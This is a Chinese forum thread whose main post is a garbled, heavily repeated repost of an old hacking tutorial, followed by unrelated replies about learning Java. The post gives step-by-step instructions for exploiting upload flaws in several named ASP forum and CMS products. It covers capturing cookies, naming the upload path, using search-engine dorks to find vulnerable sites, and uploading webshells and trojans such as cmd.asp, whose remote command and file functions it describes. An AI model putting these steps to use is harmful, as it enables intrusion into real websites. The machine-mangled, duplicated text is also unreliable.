仓酷云
标题:
JAVA网页编程之全能上传击溃ASP/PHP/JSP剧本体系
[打印本页]
作者:
莫相离
时间:
2015-1-18 11:20
标题:
JAVA网页编程之全能上传击溃ASP/PHP/JSP剧本体系
你说是sun公司对她研究的透还是微软?针对自己工具开发的.net性能上肯定会站上风的。js|剧本|上传自从动网7拉开上传毛病尾声后,各类体系的上传毛病相继而来!它们的毛病道理基础都差未几,使用办法上有稍微的差别,简言之能够归结为几步:先抓包,然后修正文件范例,再在上传路径后加上空格,用十六进制编纂器把空格改成00,最初用NC提交。固然最好仍是找一个详细的UpFile文件来本人剖析一下,如许有助于进步对毛病的了解和影象!
本文没有太深邃的手艺,只不外是把今朝发明有上传毛病的体系按编程言语分类汇总了一下,并经由过程桂林老兵的一个软件,分离实例解说各类体系的毛病使用办法。在详细实例中上传了各类盛行的WebShell,以供人人参考!同时也但愿借此能提示部分程序员在编程时要注重头脑的周密性,制止千里之堤而溃于蚁穴!上面我们先从老兵的这个工具入手下手!
先复杂先容一下老兵的这个程序,界面以下所示:
本文没有太深邃的手艺,只不外是把今朝发明有上传毛病的体系按编程言语分类汇总了一下,并经由过程桂林老兵的一个软件,分离实例解说各类体系的毛病使用办法。在详细实例中上传了各类盛行的WebShell,以供人人参考!同时也但愿借此能提示部分程序员在编程时要注重头脑的周密性,制止千里之堤而溃于蚁穴!上面我们先从老兵的这个工具入手下手!
先复杂先容一下老兵的这个程序,界面以下所示:
先复杂先容一下老兵的这个程序,界面以下所示:
为了便利申明,我们对比DvBBS的UpFile.asp和Reg_upload.asp两个文件来讲明(纷歧定要全体看懂,也许意义晓得就好了)。UpFile.asp文件为存在上传毛病的文件,而Reg_upload.asp文件为我们在填上图工具时用到的参数,也就是说,UpFile.asp这个文件在实行时用到的参数都是来自Reg_upload.asp文件中表单所提交的内容!
UpFile是经由过程天生一个Form表(在Reg_upload.asp文件中)来完成上传的。代码以下:
<formname="form"method="post"action="UpFile.asp"...>
<inputtype="hidden"name="filepath"value="uploadFace">
<inputtype="hidden"name="act"value="upload">
<inputtype="file"name="file1">
<inputtype="hidden"name="fname">
<inputtype="submit"name="Submit"value="上传"...></form>
小常识:个中用到的变量以下:
FilePath:默许值是Uploadface,即上传后默许的寄存目次,属性Hiden;
File1:这就是我们要传的文件;
分离下面的代码,我们来填写上传工具:
Action中输出存在上传毛病文件的URL:http://target.net/bbs/UpFile.asp
UpPath里第一个文本框中的FilePath即为表单中的FilePath,也就是上传路径,等号前面填的是上传到对方服务器上的后门的称号/shell.asp;输出一个WEB程序同意上传的范例文本框中默许JPG就能够了(一样平常网站都同意上传JPG图片文件);File里第一个文本框中的File1便是表单中的File1,等号前面填写所要在本机上传的木马路径;Cookies中填上我们用抓取数据包工具如WsockExpert抓取的Cookies值,记着最好是你在体系中注册后的Cookies值。
刘流:用WsockExpert来抓Cookies有点借题发挥,作者用的是一个叫TouchnetBrowser的巡游器,带有抓Cookies功效,利用起来十分便利,人人也能够思索别的能抓Cookie的程序。
好了,“刀”我们已磨厉害了,如今能够往砍柴了!实战入手下手,上面分离演示由ASP、PHP、JSP三种言语编写的剧本体系的上传毛病!
ASP体系上传毛病
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
UpFile是经由过程天生一个Form表(在Reg_upload.asp文件中)来完成上传的。代码以下:
<formname="form"method="post"action="UpFile.asp"...>
<inputtype="hidden"name="filepath"value="uploadFace">
<inputtype="hidden"name="act"value="upload">
<inputtype="file"name="file1">
<inputtype="hidden"name="fname">
<inputtype="submit"name="Submit"value="上传"...></form>
小常识:个中用到的变量以下:
FilePath:默许值是Uploadface,即上传后默许的寄存目次,属性Hiden;
File1:这就是我们要传的文件;
分离下面的代码,我们来填写上传工具:
Action中输出存在上传毛病文件的URL:http://target.net/bbs/UpFile.asp
UpPath里第一个文本框中的FilePath即为表单中的FilePath,也就是上传路径,等号前面填的是上传到对方服务器上的后门的称号/shell.asp;输出一个WEB程序同意上传的范例文本框中默许JPG就能够了(一样平常网站都同意上传JPG图片文件);File里第一个文本框中的File1便是表单中的File1,等号前面填写所要在本机上传的木马路径;Cookies中填上我们用抓取数据包工具如WsockExpert抓取的Cookies值,记着最好是你在体系中注册后的Cookies值。
刘流:用WsockExpert来抓Cookies有点借题发挥,作者用的是一个叫TouchnetBrowser的巡游器,带有抓Cookies功效,利用起来十分便利,人人也能够思索别的能抓Cookie的程序。
好了,“刀”我们已磨厉害了,如今能够往砍柴了!实战入手下手,上面分离演示由ASP、PHP、JSP三种言语编写的剧本体系的上传毛病!
ASP体系上传毛病
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
<formname="form"method="post"action="UpFile.asp"...>
<inputtype="hidden"name="filepath"value="uploadFace">
<inputtype="hidden"name="act"value="upload">
<inputtype="file"name="file1">
<inputtype="hidden"name="fname">
<inputtype="submit"name="Submit"value="上传"...></form>
小常识:个中用到的变量以下:
FilePath:默许值是Uploadface,即上传后默许的寄存目次,属性Hiden;
File1:这就是我们要传的文件;
分离下面的代码,我们来填写上传工具:
Action中输出存在上传毛病文件的URL:http://target.net/bbs/UpFile.asp
UpPath里第一个文本框中的FilePath即为表单中的FilePath,也就是上传路径,等号前面填的是上传到对方服务器上的后门的称号/shell.asp;输出一个WEB程序同意上传的范例文本框中默许JPG就能够了(一样平常网站都同意上传JPG图片文件);File里第一个文本框中的File1便是表单中的File1,等号前面填写所要在本机上传的木马路径;Cookies中填上我们用抓取数据包工具如WsockExpert抓取的Cookies值,记着最好是你在体系中注册后的Cookies值。
刘流:用WsockExpert来抓Cookies有点借题发挥,作者用的是一个叫TouchnetBrowser的巡游器,带有抓Cookies功效,利用起来十分便利,人人也能够思索别的能抓Cookie的程序。
好了,“刀”我们已磨厉害了,如今能够往砍柴了!实战入手下手,上面分离演示由ASP、PHP、JSP三种言语编写的剧本体系的上传毛病!
ASP体系上传毛病
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
FilePath:默许值是Uploadface,即上传后默许的寄存目次,属性Hiden;
File1:这就是我们要传的文件;
分离下面的代码,我们来填写上传工具:
Action中输出存在上传毛病文件的URL:http://target.net/bbs/UpFile.asp
UpPath里第一个文本框中的FilePath即为表单中的FilePath,也就是上传路径,等号前面填的是上传到对方服务器上的后门的称号/shell.asp;输出一个WEB程序同意上传的范例文本框中默许JPG就能够了(一样平常网站都同意上传JPG图片文件);File里第一个文本框中的File1便是表单中的File1,等号前面填写所要在本机上传的木马路径;Cookies中填上我们用抓取数据包工具如WsockExpert抓取的Cookies值,记着最好是你在体系中注册后的Cookies值。
刘流:用WsockExpert来抓Cookies有点借题发挥,作者用的是一个叫TouchnetBrowser的巡游器,带有抓Cookies功效,利用起来十分便利,人人也能够思索别的能抓Cookie的程序。
好了,“刀”我们已磨厉害了,如今能够往砍柴了!实战入手下手,上面分离演示由ASP、PHP、JSP三种言语编写的剧本体系的上传毛病!
ASP体系上传毛病
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
UpPath里第一个文本框中的FilePath即为表单中的FilePath,也就是上传路径,等号前面填的是上传到对方服务器上的后门的称号/shell.asp;输出一个WEB程序同意上传的范例文本框中默许JPG就能够了(一样平常网站都同意上传JPG图片文件);File里第一个文本框中的File1便是表单中的File1,等号前面填写所要在本机上传的木马路径;Cookies中填上我们用抓取数据包工具如WsockExpert抓取的Cookies值,记着最好是你在体系中注册后的Cookies值。
刘流:用WsockExpert来抓Cookies有点借题发挥,作者用的是一个叫TouchnetBrowser的巡游器,带有抓Cookies功效,利用起来十分便利,人人也能够思索别的能抓Cookie的程序。
好了,“刀”我们已磨厉害了,如今能够往砍柴了!实战入手下手,上面分离演示由ASP、PHP、JSP三种言语编写的剧本体系的上传毛病!
ASP体系上传毛病
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
刘流:用WsockExpert来抓Cookies有点借题发挥,作者用的是一个叫TouchnetBrowser的巡游器,带有抓Cookies功效,利用起来十分便利,人人也能够思索别的能抓Cookie的程序。
好了,“刀”我们已磨厉害了,如今能够往砍柴了!实战入手下手,上面分离演示由ASP、PHP、JSP三种言语编写的剧本体系的上传毛病!
ASP体系上传毛病
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
ASP体系上传毛病
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
1.【动网论坛】
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
DvBBS7.0sp2以下一切版本(本测试利用DvBBS7.0sp1版本)。因为动网的上传毛病是最多见,也是人人最熟习的,这里就未几先容了。分离在程序中各框体内填上实践的数据,提交后守候就OK了!如所示。
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
Action:填进http://www.***.com/bbs/upfile.asp
UpPath第一个文本框填进:filepath;第二个填进:/cmd.asp(你也能够写/bbs/cmd.asp如许上传乐成后就传到/bbs目次下了!)
输出一个WEB程序同意上传的范例文本框中默许JPG就能够了
File第一个文本框输出:file1;第二个填进:D:Hacktoolsmumacmd.asp(这个是cmd.asp这个后门在本人呆板上的路径)
Cookies:是我用Touchnetbrowse这个扫瞄器抓的!其次要功效是用来考证!没有它会报错的噢!填好了!我们就点击“Submit”按键提交吧!!
提交后用扫瞄器看一下是不是乐成,乐成上传!如所示。
后门先容:用的是一个很老的后门,文本框中输出DOS命令”netstatCan”点运转后,就会看到本机都开了哪些端口,及与远程主机的毗连情形了^_^
小提醒:文件已上传乐成,但没有呈现“上传乐成”的提醒对话框,能够在扫瞄器里间接输出方针站点上的WebShell路径来测试是不是乐成,程序偶然候会有误报。
2.【尘缘旧事体系】
尘缘旧事体系0.45Finish以下版本(测试版本V1.0ACCESSFinish)。先在Google里搜刮关头词:V1.0ACCESSFinish,会看到呈现一年夜堆利用尘缘雅境体系的网站,而它们就是我们的方针了!
先来剖析一下怎样填写参数:好比说某网站首页是http://www.xx.com/asfq/index.asp,那末就要如许填写:
Action:http://www.xx.com/asfq/admin/uploadfaceok.asp
毛病目次:/asfq/admin(注重必定要加上admin)
在Uploadface.asp中找响应的参数;Uploadface.asp中的以下表单:
<formname="form"method="post"action="uploadfaceok.asp"enctype="multipart/form-data">
<inputtype="hidden"name="CopyrightInfo"value="http://www.chinaasp.com">
<inputtype="hidden"name="filepath"value="../uploadfile/face/">
<inputtype="hidden"name="act"value="upload"><inputtype="file"name="file1"size=10title="范例:jpg,gif,png,bmp,限定:200K">
<inputtype="submit"name="Submit"value="上传">
参数的填写办法相似动网的!
提交数据,乐成后了局如、5所示。
小提醒:文件已上传乐成,但没有呈现“上传乐成”的提醒对话框,能够在扫瞄器里间接输出方针站点上的WebShell路径来测试是不是乐成,程序偶然候会有误报。
2.【尘缘旧事体系】
尘缘旧事体系0.45Finish以下版本(测试版本V1.0ACCESSFinish)。先在Google里搜刮关头词:V1.0ACCESSFinish,会看到呈现一年夜堆利用尘缘雅境体系的网站,而它们就是我们的方针了!
先来剖析一下怎样填写参数:好比说某网站首页是http://www.xx.com/asfq/index.asp,那末就要如许填写:
Action:http://www.xx.com/asfq/admin/uploadfaceok.asp
毛病目次:/asfq/admin(注重必定要加上admin)
在Uploadface.asp中找响应的参数;Uploadface.asp中的以下表单:
<formname="form"method="post"action="uploadfaceok.asp"enctype="multipart/form-data">
<inputtype="hidden"name="CopyrightInfo"value="http://www.chinaasp.com">
<inputtype="hidden"name="filepath"value="../uploadfile/face/">
<inputtype="hidden"name="act"value="upload"><inputtype="file"name="file1"size=10title="范例:jpg,gif,png,bmp,限定:200K">
<inputtype="submit"name="Submit"value="上传">
参数的填写办法相似动网的!
提交数据,乐成后了局如、5所示。
尘缘旧事体系0.45Finish以下版本(测试版本V1.0ACCESSFinish)。先在Google里搜刮关头词:V1.0ACCESSFinish,会看到呈现一年夜堆利用尘缘雅境体系的网站,而它们就是我们的方针了!
先来剖析一下怎样填写参数:好比说某网站首页是http://www.xx.com/asfq/index.asp,那末就要如许填写:
Action:http://www.xx.com/asfq/admin/uploadfaceok.asp
毛病目次:/asfq/admin(注重必定要加上admin)
在Uploadface.asp中找响应的参数;Uploadface.asp中的以下表单:
<formname="form"method="post"action="uploadfaceok.asp"enctype="multipart/form-data">
<inputtype="hidden"name="CopyrightInfo"value="http://www.chinaasp.com">
<inputtype="hidden"name="filepath"value="../uploadfile/face/">
<inputtype="hidden"name="act"value="upload"><inputtype="file"name="file1"size=10title="范例:jpg,gif,png,bmp,限定:200K">
<inputtype="submit"name="Submit"value="上传">
参数的填写办法相似动网的!
提交数据,乐成后了局如、5所示。
先来剖析一下怎样填写参数:好比说某网站首页是http://www.xx.com/asfq/index.asp,那末就要如许填写:
Action:http://www.xx.com/asfq/admin/uploadfaceok.asp
毛病目次:/asfq/admin(注重必定要加上admin)
在Uploadface.asp中找响应的参数;Uploadface.asp中的以下表单:
<formname="form"method="post"action="uploadfaceok.asp"enctype="multipart/form-data">
<inputtype="hidden"name="CopyrightInfo"value="http://www.chinaasp.com">
<inputtype="hidden"name="filepath"value="../uploadfile/face/">
<inputtype="hidden"name="act"value="upload"><inputtype="file"name="file1"size=10title="范例:jpg,gif,png,bmp,限定:200K">
<inputtype="submit"name="Submit"value="上传">
参数的填写办法相似动网的!
提交数据,乐成后了局如、5所示。
Action:http://www.xx.com/asfq/admin/uploadfaceok.asp
毛病目次:/asfq/admin(注重必定要加上admin)
在Uploadface.asp中找响应的参数;Uploadface.asp中的以下表单:
<formname="form"method="post"action="uploadfaceok.asp"enctype="multipart/form-data">
<inputtype="hidden"name="CopyrightInfo"value="http://www.chinaasp.com">
<inputtype="hidden"name="filepath"value="../uploadfile/face/">
<inputtype="hidden"name="act"value="upload"><inputtype="file"name="file1"size=10title="范例:jpg,gif,png,bmp,限定:200K">
<inputtype="submit"name="Submit"value="上传">
参数的填写办法相似动网的!
提交数据,乐成后了局如、5所示。
毛病目次:/asfq/admin(注重必定要加上admin)
在Uploadface.asp中找响应的参数;Uploadface.asp中的以下表单:
<formname="form"method="post"action="uploadfaceok.asp"enctype="multipart/form-data">
<inputtype="hidden"name="CopyrightInfo"value="http://www.chinaasp.com">
<inputtype="hidden"name="filepath"value="../uploadfile/face/">
<inputtype="hidden"name="act"value="upload"><inputtype="file"name="file1"size=10title="范例:jpg,gif,png,bmp,限定:200K">
<inputtype="submit"name="Submit"value="上传">
参数的填写办法相似动网的!
提交数据,乐成后了局如、5所示。
在Uploadface.asp中找响应的参数;Uploadface.asp中的以下表单:
<formname="form"method="post"action="uploadfaceok.asp"enctype="multipart/form-data">
<inputtype="hidden"name="CopyrightInfo"value="http://www.chinaasp.com">
<inputtype="hidden"name="filepath"value="../uploadfile/face/">
<inputtype="hidden"name="act"value="upload"><inputtype="file"name="file1"size=10title="范例:jpg,gif,png,bmp,限定:200K">
<inputtype="submit"name="Submit"value="上传">
参数的填写办法相似动网的!
提交数据,乐成后了局如、5所示。
后门先容:用的是动鲨的一个网页木马,实行DOS之前,你还要把c:winntsystem32cmd.exe上传到与网页木马不异的目次下,不然命令是不会实行的!良多网站做了平安战略,使用上例的木马DOS命令不克不及实行,偶然使用动鲨的这个asp木马就能够实行一些DOS命令了!
小提醒:毛病文件一样平常不必改,不外有些老版的尘缘体系的毛病文件是Uploadok.asp,假如Uploadfaceok.asp不乐成再改成Uploadok.asp。
小提醒:毛病文件一样平常不必改,不外有些老版的尘缘体系的毛病文件是Uploadok.asp,假如Uploadfaceok.asp不乐成再改成Uploadok.asp。
3.【动感下载体系】
动感下载体系XP专业版v1.3Build0112及以下版本。在百度里搜刮:SoftView.Asp?SoftID=,找到N多套体系。在它的Upload.asp中存在以下表单:
<formname="form"method="post"action="UpFile.asp"enctype="multipart/form-data">
<inputtype="hidden"name="filepath"value="../upload200409">
<inputtype="hidden"name="act"value="upload">文件地位:
<inputtype="file"name="file1"size="38">
<inputtype="submit"name="Submit"value="上传"><br>文件范例:gif/jpg/zip/rar,巨细限定:3000K</form>
有功底的伴侣也许都看出来成绩了吧?这里文章不是剖析详细毛病的,也就不做具体解说了,老手伴侣们就间接先按上面的参数提交乐成后再来渐渐研讨详细的毛病吧!如、7所示。
后门先容:_blank>冰狐荡子微型ASP后门,十分小的一个后门仅一句话,也可插在其余网页内里,它把经常使用功效集成到一同,写进存在的文件、情况探测、磁盘信息、搜刮收集邻人共享
小提醒:在百度里搜刮:SoftView.Asp?SoftID=找到的版本是Access版的程序,假如搜刮/SoftView/SoftView,找到的是SQL版的程序。
4.【Dxxo论坛】
Dxxo论坛2004年1月公布版。它的Uploadface.asp文件中存在以下表单:
<formmethod="post"action="upload.asp"enctype="multipart/form-data"name="form2"class=tdc>
<inputtype=filename="file1"size="40"class=bdtj>
<inputtype="hidden"name="uploadfacey"value="uploadface/">
<inputtype="submit"name="submit"value="上传"class=bdtj></form>
这里和后面的毛病有点分歧,UpPath第一个文本框中要改成Uploadfacey而不是上例中的FilePath,Cookies的值要注册后抓的值,否则没法乐成!详细参数以下,9所示。
后门先容:一个很不错的木马,可让你在方针呆板上写文件!在保留文件的相对路径下的文本框中输出方针呆板上木马的寄存地位和文件名,相对路径上面已给出来了!我们能够参照着它写;在输出马的内容中复制上木马的内容!点保留就OK了!
小提醒:这里不要管右边文本框呈现的上传乐成后显现的文件名(下划线部分):
<script>parent.form1.f3_content.value+=[uploadimg]fyzw_2004926201636.jpg[/uploadimg]</script>test.jpg(1162)上传乐成!没有看到test.asp,不妨只需间接在扫瞄中间接输出WebShell的地点会见就能够失掉后门了(如所示):http://www.ri*an.cc/bbs/uploadface/test.asp
5.【天意商务网】
天意商务网3.6、3.7版。在百度中搜刮“天意商务网”,会找到良多装有天意商务网的站点。它的Add.asp文件中存在以下表单:
<formmethod="POST"action="zs_save_add.asp"name="Form1"nctype="multipart/form-data">
<inputtype="hidden"name="filepath"value="../../picture/">
<INPUTtype="file"class="f11"name="file"size="33"title=上传产物图片材料不克不及年夜于200K。(请求:250×250像素)>
这里也有一点分歧,File的第一个文本框中要输出file,“zs_save_add.asp”切实其实切地位是:“manage/spzs/zs_save_add.asp”,并且乐成后也没有呈现“上传乐成”的对话框!参数以下0、11所示:
10图
1
后门先容:带着名字,暗码,认证,能够把它假装成一个背景办理界面,并且功效也良多。
小提醒:天意商务网体系有一个变量ID过滤不严,使用NBSI2很简单注进!!
⑥【乔客论坛】
所用版本:JoekoeV6.0。这个是我在做实行过程当中用时最多的一个,由于参数太多,入手下手实行时老是报参数毛病。
起首来看怎样找到我们用的表单:
在扫瞄中输出http://www.zr1*3.com/user_put.asp?action=gallery(别忘了登录噢!)然后检察源文件内容:
<tr><td>上传图片:</td><td><iframeframeborder=0name=upload_framewidth=100%height=30scrolling=nosrc=upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic></iframe></td></tr>
表单寄存在upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic中了!
其次在表单中找参数:
在扫瞄器中输出:http://www.zr1*3.com/upload.asp?action=gallery&upname=g2004927110356&uptext=pic检察其源文件内容:
<formname=form1action=?action=UpFilemethod=postenctype=multipart/form-data>
<inputtype=hiddenname=up_pathvalue=gallery>
<inputtype=hiddenname=up_namevalue=g2004927110356>
<inputtype=hiddenname=up_textvalue=pic><tr>
<td><inputtype=filename=file_name1value=size=40></td>
<tdalign=centerheight=30><inputtype=submitname=submitvalue=点击上传>
注重:在Action中输出http://www.zr1*3.com/upload.asp?action=UpFile;UpPath第一个文本框中输出:up_name,第二其中输出上传后的SHELL称号test.asp;File第一个文本框中输出file_name1;参数以下2、13所示:
2
3
后门先容:用的是血汉团体丑化版!此木马功效十分多,可算是木马中的精典!第一:就算你失掉了源代码也看不到明文的暗码!第二:具有扫瞄,上传,下载,复制,删除,实行DOS命令,实行SQL命令,检察体系设置及nfso功效!
小提醒:http://www.zr1*3.com/upload.asp?action=UpFile,以参数action=UpFile必定不克不及丢啊!!如3所示,后门地点路径为:upload/other/test.asp
5.【天意商务网】
天意商务网3.6、3.7版。在百度中搜刮“天意商务网”,会找到良多装有天意商务网的站点。它的Add.asp文件中存在以下表单:
<formmethod="POST"action="zs_save_add.asp"name="Form1"nctype="multipart/form-data">
<inputtype="hidden"name="filepath"value="../../picture/">
<INPUTtype="file"class="f11"name="file"size="33"title=上传产物图片材料不克不及年夜于200K。(请求:250×250像素)>
这里也有一点分歧,File的第一个文本框中要输出file,“zs_save_add.asp”切实其实切地位是:“manage/spzs/zs_save_add.asp”,并且乐成后也没有呈现“上传乐成”的对话框!参数以下0、11所示:
10图
1
后门先容:带着名字,暗码,认证,能够把它假装成一个背景办理界面,并且功效也良多。
小提醒:天意商务网体系有一个变量ID过滤不严,使用NBSI2很简单注进!!
⑥【乔客论坛】
所用版本:JoekoeV6.0。这个是我在做实行过程当中用时最多的一个,由于参数太多,入手下手实行时老是报参数毛病。
起首来看怎样找到我们用的表单:
在扫瞄中输出http://www.zr1*3.com/user_put.asp?action=gallery(别忘了登录噢!)然后检察源文件内容:
<tr><td>上传图片:</td><td><iframeframeborder=0name=upload_framewidth=100%height=30scrolling=nosrc=upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic></iframe></td></tr>
表单寄存在upload.asp?uppath=gallery&upname=g2004927110356&uptext=pic中了!
其次在表单中找参数:
在扫瞄器中输出:http://www.zr1*3.com/upload.asp?action=gallery&upname=g2004927110356&uptext=pic检察其源文件内容:
<formname=form1action=?action=UpFilemethod=postenctype=multipart/form-data>
<inputtype=hiddenname=up_pathvalue=gallery>
<inputtype=hiddenname=up_namevalue=g2004927110356>
<inputtype=hiddenname=up_textvalue=pic><tr>
<td><inputtype=filename=file_name1value=size=40></td>
<tdalign=centerheight=30><inputtype=submitname=submitvalue=点击上传>
注重:在Action中输出http://www.zr1*3.com/upload.asp?action=UpFile;UpPath第一个文本框中输出:up_name,第二其中输出上传后的SHELL称号test.asp;File第一个文本框中输出file_name1;参数以下2、13所示:
2
3
后门先容:用的是血汉团体丑化版!此木马功效十分多,可算是木马中的精典!第一:就算你失掉了源代码也看不到明文的暗码!第二:具有扫瞄,上传,下载,复制,删除,实行DOS命令,实行SQL命令,检察体系设置及nfso功效!
小提醒:http://www.zr1*3.com/upload.asp?action=UpFile,以参数action=UpFile必定不克不及丢啊!!如3所示,后门地点路径为:upload/other/test.asp
多谢指点,其实我对.net和ruby也不是很了解,对与java也只是刚起步的阶段,只是在学习中有了点想法就写出来了,现在俺本科还没毕业,所以对大型项目基本上也没有什么经验。
作者:
金色的骷髅
时间:
2015-1-20 20:43
是一种由美国SUN计算机公司(Sun Microsystems, Inc.)所研究而成的语言
作者:
冷月葬花魂
时间:
2015-1-25 22:03
其实说这种话的人就如当年小日本号称“三个月拿下中国”一样大言不惭。不是Tomjava泼你冷水,你现在只是学到了Java的骨架,却还没有学到Java的精髓。接下来你得研究设计模式了。
作者:
简单生活
时间:
2015-2-1 17:09
Java是一种计算机编程语言,拥有跨平台、面向对java
作者:
飘飘悠悠
时间:
2015-2-21 18:59
Pet Store.(宠物店)是SUN公司为了演示其J2EE编程规范而推出的开放源码的程序,应该很具有权威性,想学J2EE和EJB的朋友不要 错过了。
作者:
若天明
时间:
2015-3-3 23:06
如果你学过HTML,那么事情要好办的多,如果没有,那你快去补一补HTML基础吧。其实JSP中的Java语法也不多,它更象一个脚本语言,有点象ASP。
作者:
若相依
时间:
2015-3-11 07:46
有时间再研究一下MVC结构(把Model-View-Control分离开的设计思想)
作者:
兰色精灵
时间:
2015-3-17 23:10
是一种为 Internet发展的计算机语言
作者:
海妖
时间:
2015-3-25 06:33
自从Sun推出Java以来,就力图使之无所不包,所以Java发展到现在,按应用来分主要分为三大块:J2SE,J2ME和J2EE,这也就是Sun ONE(Open Net Environment)体系。J2SE就是Java2的标准版,主要用于桌面应用软件的编程;J2ME主要应用于嵌入是系统开发,如手机和PDA的编程;J2EE是Java2的企业版,主要用于分布式的网络程序的开发,如电子商务网站和ERP系统。
欢迎光临 仓酷云 (http://ckuyun.com/)
Powered by Discuz! X3.2